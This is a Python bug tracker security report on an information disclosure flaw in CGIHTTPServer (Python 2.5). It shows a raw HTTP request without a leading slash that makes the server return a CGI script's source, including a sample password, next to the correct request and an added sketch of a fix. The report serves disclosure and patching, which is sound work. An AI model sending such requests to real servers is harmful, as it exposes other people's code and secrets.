New submission from sumar:

================================================================================
Summary:
================================================================================
An information disclosure flaw exists in the standard Python CGIHTTPServer
module. The bug is confirmed in Python 2.5 @ Fedora 7 (python-2.5-15.fc7).

================================================================================
Description:
================================================================================
Requesting a CGI script (in the example, test.py) without / at the beginning
of the URL causes the script content/code to be returned instead of the script
being executed. It could lead to disclosure of secret information, e.g. a
password.

================================================================================
Exploit code:
================================================================================
Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python
print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.

================================================================================
correct request:
================================================================================
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.
================================================================================

----------
components: Library (Lib)
messages: 63361
nosy: m.sucajtys
severity: normal
status: open
title: Python CGIHTTPServer information disclosure
type: security
versions: Python 2.5

__________________________________
Tracker <[EMAIL PROTECTED]>
<http://bugs.python.org/issue2254>
__________________________________
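
Added illustration (not part of the original report, and not CPython's own code): a simplified Python model of the dispatch mismatch reported above, where the CGI check matches on the raw request target while the static handler resolves the same target to a file. The function names, the directory list and the simplified path handling are assumptions made for this sketch.

```python
import posixpath

CGI_DIRECTORIES = ["/cgi-bin", "/htbin"]  # assumed values for this sketch


def naive_is_cgi(path):
    """Prefix match on the raw request target (models the reported behaviour)."""
    for d in CGI_DIRECTORIES:
        if path[:len(d)] == d and (not path[len(d):] or path[len(d)] == "/"):
            return True
    return False


def translate_path(path):
    """Resolve a request target to a relative file path the way a static file
    handler typically does: drop query/fragment, normalise, skip empty parts."""
    path = path.split("?", 1)[0].split("#", 1)[0]
    parts = posixpath.normpath(path).split("/")
    return "/".join(p for p in parts if p not in ("", ".", ".."))


def hardened_is_cgi(path):
    """Run the CGI check on the same normalised path that would be served,
    so both decisions agree on which file the request refers to."""
    return naive_is_cgi("/" + translate_path(path))


def dispatch(path, is_cgi):
    """Return the action the modelled server takes for a request target."""
    if is_cgi(path):
        return "execute"
    return "serve-file:" + translate_path(path)


# Constructed inputs: the two request targets from the report, plus a plain
# static file to show the hardened check does not change normal serving.
SAMPLES = ["/cgi-bin/test.py", "cgi-bin/test.py", "/index.html"]

if __name__ == "__main__":
    for target in SAMPLES:
        print("%-20r naive=%-28s hardened=%s" % (
            target,
            dispatch(target, naive_is_cgi),
            dispatch(target, hardened_is_cgi)))
```

A stricter alternative is to answer 400 to any request target that does not begin with "/", since such a target is not a valid origin-form path.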